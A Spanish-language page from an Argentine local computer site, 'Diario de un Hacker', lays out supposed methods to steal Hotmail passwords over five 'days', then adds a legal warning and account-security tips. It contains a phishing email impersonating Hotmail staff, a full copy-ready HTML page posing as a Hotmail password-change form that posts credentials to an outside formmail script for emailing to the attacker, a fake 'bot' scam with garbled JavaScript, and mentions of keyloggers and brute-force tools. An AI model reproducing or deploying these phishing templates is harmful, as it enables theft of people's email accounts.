Todo PC en Gualeguaychu

Menú principal

Hosting y Dominios

Dominios .ar

Sponsor para web

 

Paginas amigas

Directorio de búsqueda de Gualeguaychú

Tiempo libre

Servicios informáticos

Mis Apuntes

el laberinto

todo pc

do-contack

inmobiliaria gualeguaychu

Bienvenidos a todo PC. Gualeguaychu -Entre rios

Gualeguaychu ciudad de mis amores, testigo de infancia, grandiosa y esplendorosa Gualeguaychu espeluznante con sus verdes, despierta en otoño, festiva en verano,  Cándido en invierno. Gualeguaychu es mi ciudad fuerte como el acero y calida como la hoguera, por eso la defiendo, y tu también debes hacerlo, porque ella es parte de argentina, de Entre Ríos, es parte de tu vida, DÍGALE NO A LA PAPELERA SI A LA VIDA. Si usted es de gualeguaychu y desea opinar sobre las papeleras envié un mail a directoriogchu@hotmail.com y será publicada su opinión en la dirección de abajo.

 http://www.directoriogchu.com.ar 

─────────────────────────────────────────────

Diario de un Hacker

Métodos para robar contraseñas de hotmail o Hackear hotmail

────────────────────────

►Día uno (método Principiante)

Dejar este mensaje en un foro o envíaselo a la persona que le queres robar la contraseña diciéndole que encontraste la forma de Hackear y que a vos te funciono

Hola a todos acá les dejo como robar passwords de Hotmail yo lo prevé y resulto... Existe una pequeña pero grave vulnerabilidad en el Bot que valida los datos que llegan al servidor de yahoo y Hotmail, es imposible entrar y manipular dicho bot para que te mande los password que tu quieras a tu correo, pero es posible forzarlo para que lo haga
mediante Javascript. De ese modo el bot es forzado a enviarte el password que le pidas, ya que si le mandas el script desde un correo de Yahoo o Hotmail, no tendrá por que resistirse. A continuación los pasos:
1.- Entra a tu Correo
2.- Ve a redactar, ya que lo que haremos será enviar un e-mail
3.- en la parte que tienes que escribir el correo del destino, escribe la dirección del bot: password5hg@hotmail.com
4.- En asunto escribe: </passwd/etc/rootlogin
5.- y en el cuerpo del mensaje debes poner el código Javascript, con los datos modificados. el código es:
</SCRIPT LANGUAGE="JavaScript">
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*24*60*60*1000));
function amt(){
var count = GetCookie('count')
if(count == null) {
SetCookie('count','1')
return 1
}
else {
var newcount = parseInt(count) + 1;
DeleteCookie('count')
SetCookie('EL MAIL DE TU VICTIMA)
return count
}
}
function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
function checkCount(TU EMAIL) {
var count = GetCookie('count');
if (count == null) {
count=(TU PASSWORD)
SetCookie('count', count, exp);
6.- Una vez listo dale enviar, e inmediatamente recibirás un mail
del Bot, con los datos que solicitaste. Esto es totalmente anónimo,
ya que el bot es solo una maquina que no graba ningún mail del
solicitante. por que piensa que es del mismísimo Server de Hotmail.

(Por supuesto que la cuenta de corre password5hg@hotmail.com es tuya y ya vas a tener su contraseña porque en el escrip te va a enviar su contraseña...jejeje....No se la esperaban no?)

────────────────────────

►Día dos (método lamer)

enviar un mail haciéndose pasar por el personal de Hotmail

Estimado usuario de Hotmail, como sabrá, MSN es un portal que cuenta con millones de usuarios en todo el mundo, y por tanto, se está sobrecargando. El motivo de que le enviemos este mensaje es que estamos eliminando las cuentas en desuso, por lo tanto deberá enviarnos el nombre de su dirección de correo electrónico adjunto de su contraseña a esta misma dirección.

Esto lo hacemos por no violar su privacidad, de no enviarnos este mensaje de vuelta, su cuenta de Hotmail tiene el riesgo de expirar a los 15 días de recibir este mensaje, la dirección a la cuál debe responder aparecerá más abajo.

serviciohotmail@hotmail.com

Disculpe por las Molestias.

Personal de Hotmail.

────────────────────────

►Día Tres (método canchero o que se las dan de winner)

A.- Modo Fácil:

Con acceso a la maquina donde se revisa el correo.

_ Si la victima revisa el e-mail desde el vulnerable Outlook de Micro$oft entonces es todo tuyo, lo mas difícil seria poder quedarse en la maquina victima donde la cuenta esta configurada (...en el outlook...) y sin que nadie sospechoso te vea... procedes del siguiente modo;

+Bajate el Revealer

+Abrilo. Y anda al outlook, clickea en Herramientas/Cuentas/buscas y 2click a la cuenta victima/anda a la solapa servidores/ y con el revealer, clickeas en "track" y arrastrando con el mouse te moves hasta los asteriscos del casillero "contraseña".

_ Si la victima no revisa en el Outlook, y si en otro cliente podes fijarte si el pwd se guarda con **** entonces seria parecido a lo anterior con el revealer.

_ Si la victima revisa el correo desde webmail, o sea ingresando a hotmail.com y poniendo login y password también es bastante fácil ya que podemos colocarle a la maquina el teclasss.exe que es un keylogger de los mas sencillos y útiles.
Ese es el modo sencillo.

B.- Modo Difícil:

Sin acceso a la maquina donde se revisa el correo.

El tema se complica un cacho cuando no tenemos acceso a la maquina de donde se revisa el e-mail.
_ Una opción que tenemos es una de las mas tediosas, pero que el tiempo hace la efectividad, estoy hablando de crackear con el HotmailHack, u excelente programa que se ocupa de probar por fuerza bruta todas las combinaciones posibles de caracteres para dar con la clave e ingresar a la cuenta o por lista de palabras hechas por vos o descargadas de Internet (aca hay varias) donde posiblemente alguna de todas esas sea la contraseña.

────────────────────────

►Día cuatro (método de los que se las dan de expertos)

utilización de xploit acá les dejo uno( copiar y péga en el blog de notas y aguardarlo como tunombre.html  y subirlo a un servidor para que te funcione le envías un e-mail diciéndole que es una encuesta de Hotmail y o bien envíaselo por e-mail)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>Hotmail.com - Cambie su contraseña</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="Microsoft FrontPage 5.0" name=GENERATOR></HEAD>
<BODY vLink=#ffffff aLink=#ffffff link=#ffffff bgColor=#ffffff>
<META content=xploit name="xploit para Hotmail o Msn">
<TABLE width=590 align=center bgColor=#ffffff>
<TBODY></TBODY></TABLE>
<TABLE
style="BORDER-TOP-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px"
height=154 cellSpacing=0 cellPadding=0 width=550 border=0 VALIGN="BOTTOM">
<TBODY>
<TR>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none"
bgColor=#ffffff colSpan=2 height=149><IMG height=105
src="http://64.4.20.24/crs_42.gif" width=602 border=0></TD></TR>
<FORM action=http://www.tabasqueno.com/cgi-bin/formmail4.cgi method=post>
<INPUT
type=hidden value=TUCORREOAQUI@hotmail.com name=recipient> <INPUT
type=hidden value=http://privacy.t1msn.com.mx/ name=redirect>
<TR>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none"
align=middle height=32>
<P align=right><FONT face=Tahoma size=2>Usuario:
</FONT></P></TD>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none"
height=32><FONT face=VERDANA size=2>
<INPUT type=USUARIO name=USUARIO size="20">@
<SELECT size=1 name=Server> <OPTION value=HOTMAIL.COM
selected>hotmail.com</OPTION> <OPTION
value=MSN.COM>msn.com</OPTION></SELECT></FONT></TD></TR>
<TR>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none"
align=middle height=31>
<P align=right><FONT face=VERDANA size=2><FONT face=Tahoma>Contraseña
anterior:</FONT> </FONT></P></TD>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none"
height=31><FONT face=VERDANA size=2>
<INPUT type=password
name=REAL_PASSWORD size="20"></FONT></TD></TR>
<TR>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none"
align=middle height=30>
<P align=right><FONT face=VERDANA size=2><FONT face=Tahoma>Contraseña
nueva:</FONT> </FONT></P></TD>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none"
height=30><FONT face=VERDANA size=2>
<INPUT type=password
name=NEW_PASSWORD size="20"></FONT></TD></TR>
<TR>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none"
align=middle height=30>
<P align=right><FONT face=VERDANA size=2><FONT face=Tahoma>Repetir
contraseña<STRONG>:</STRONG></FONT> </FONT></P></TD>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none"
height=30><FONT face=VERDANA size=2>
<INPUT type=password
name=REPT_PASSWORD size="20"></FONT></TD></TR>
<P>
<TR>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none"
height=1></TD>
<TD
style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none"
height=1><FONT face=VERDANA size=2><BR><INPUT type=submit value=Aceptar> <INPUT type=reset value=Cancelar></FONT></TD></TR></P></TBODY></TABLE></TD>
<TABLE height=400 width=604 align=left bgColor=#ffffff VALIGN="BOTTOM"><FONT
face=ARIAL>
<TBODY>
<TR>
<TD width=598>
<P style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px" align=justify><FONT
face=Tahoma size=2> Debido al reciente ataque
ocurrido a la base de datos de <B>Microsoft,</B> la empresa mas grande del
mundo en correo electrónico gratuito y <B>Hotmail</B> que trabaja en
conjunción con dicha empresa, se vio en la necesidad de pedirle a todos
sus usuarios alrededor del mundo que cambien su actual contraseña por una
nueva para evitar posibles daños a su privacidad. Es necesario que
comprenda la gravedad del caso cambiando su contraseña para los servicios
de <B>Hotmail</B> ya que así se sentirá mas seguro al igual que
nosotros.</B> <BR>Al presionar el botón "Aceptar" su nueva contraseña
quedara registrada en nuestra base de datos como su nueva contraseña y
desde ese momento podrá empezar a utilizarla en todos los servicios que
<B>Hotmail</B> le ofrece. </FONT></P>
<P style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px" align=justify><FONT
face=Tahoma size=2>El personal de <B>Hotmail</B> agradece su comprensión y
pide de antemano disculpas por las molestias ocasionadas por
esto. </FONT></FONT>
<P style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"><FONT
face=ARIAL>
<B><FONT face=Tahoma
size=2>Jueves 10 de Septiembre de 2003</FONT></B></P></TD></TR>
<TR>
<TD align=middle width=598>
<P style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"><FONT face=VERDANA
size=2><FONT face=Tahoma>®</FONT> 2003 Microsoft Corporation.Reservados
todos los derechos. <BR><A
href="http://memberservices.passport.net/memberservice.srf?lc=3082&id=2&cbid=2"><FONT
color=#0000ff>Servicios para usuarios</FONT></A><FONT color=#0000ff>
</FONT><A href="http://g.msn.com/1HM506701/D" target=_top><FONT
color=#0000ff>CONDICIONES DE USO</FONT></A><FONT color=#0000ff> </FONT><A
href="http://g.msn.com/1HM506701/C" target=_top><FONT
color=#0000ff>Declaración de privacidad</FONT></A></FONT><FONT
color=#0000ff> </FONT></P></TD></TR></TBODY></TABLE></FONT></FORM></BODY></HTML>

────────────────────────

►Día cinco (método encerrado entre rejas)

Si llegas a este día va a ser tu peor día, porque Hackear o Robar a Microsoft es ilegal y esta penalizado por la ley, esta es la razón por la que no debes robar cuentas de Hotmail, estos métodos son inútiles porque no hay forma de Hackear Hotmail pero si de  engañar a la persona diciéndole que sos el personal de Hotmail o que le envías una postal re linda que la mire y que principalmente ingrese la contraseña. Si algún usuario de con experiencia le cae alguna de estas cosas simplemente se te a reír y mucho.

Recuerda que el correo es algo personal y todos piensan en robar las contraseñas para saber si su novia los engaña o si el amigo les mintió o simplemente porque les tienen rabia, pero piensa bien que si engañas a alguien y le sacas la contraseña y te encuentran te meterán preso o simplemente si se entera tu novia y no te engaña te dejara, o si se entera tu amigo ya no lo será mas, o si se lo haces al que le tenes rabia te matara a piñas.


Precaución para su correo
*Las siguientes son algunas de las precauciones de seguridad mínimas que un usuario debe seguir para prevenir el robo de cuentas.

Lo básico
Instale un antivirus, un firewall y mantenga sus sistemas actualizados, sobre todo los más populares -Messenger, Explorer, Outlook- ya que sus fallas son frecuentemente aprovechadas.

Ingeniería social
No repita su contraseña a nadie. Suena tonto -y lo es-, pero sucede con frecuencia. En este sentido la ingeniería social se encarga de conseguir las contraseñas mediante un engaño, ya sea haciéndose pasar por la compañía de e-mail o a través de un documento html fraudulento.

Un buen password
Seleccione una contraseña lo suficientemente larga, que combine mayúsculas, minúsculas, número y signos. No utilice palabras de diccionario y procure no repetir caracteres.
El siguiente es un ejemplo de una contraseña razonablemente segura, que previene los ataques de diccionario y fuerza bruta (programas que prueban miles de combinaciones de letras):

9ForoKrackman88#

La pregunta "secreta"
La respuesta a la pregunta secreta no debe ser evidente para las personas que le conozcan.
Muchas cuentas robadas lo son por personas con relación con el afectado -un ex despechado, una ex sicópata- que pueden deducir sin mucha dificultad la respuesta.

Recuérdame...
Dejar que Windows recuerde las contraseñas implica que se archiven en el sistema. Y todo lo que se archiva puede ser robado. Tampoco lo deje cerca de la computadora en un post-it. Memoricé su password, y cámbielo de forma regular.

Cookies
Por la red circulan demasiados scripts que aprovechan las vulnerabilidades de Internet Explorer para acceder a las contraseñas, por lo que en Hotmail siempre debe activarse en el apartado opciones la finalización de la sesión.

IP
Al activar un contacto en MSN la otra persona puede averiguar su IP actual, lo mismo al enviar un correo, postear en un foro o visitar una página. Tenga esto en mente, pues averiguar la IP es uno de los primeros pasos para muchas acciones posteriores, desde escaneo de puertos hasta robo de passwords.

Troyanos
Muchos troyanos permiten la manipulación casi total del sistema atacado, y por supuesto la obtención de contraseñas almacenadas...Le sorprendería saber cuántas son robadas con este metodo. Para prevenirlo mantenga su antivirus, lo mismo que el firewall, actualizado, activado y nunca, pero nunca, acepte archivos no solicitados.

En boca cerrada...
El último consejo, pero no menos importante, es no utilizar las cuentas de correo tipo Hotmail para nada que sea personal.
Como regla general, procure no escribir cualquier tipo de correo que resultaría embarazoso si es publicado.


LOS PEORES PASSWORDS
*Las contraseñas más fáciles de conseguir son los nombres propios, las fechas de nacimiento y la peor, que aunque no lo crea mucha gente usa, es la palabra "password". ¿Que porqué son malos? Son obvios, fáciles de adivinar y ...¿mencionamos obvios?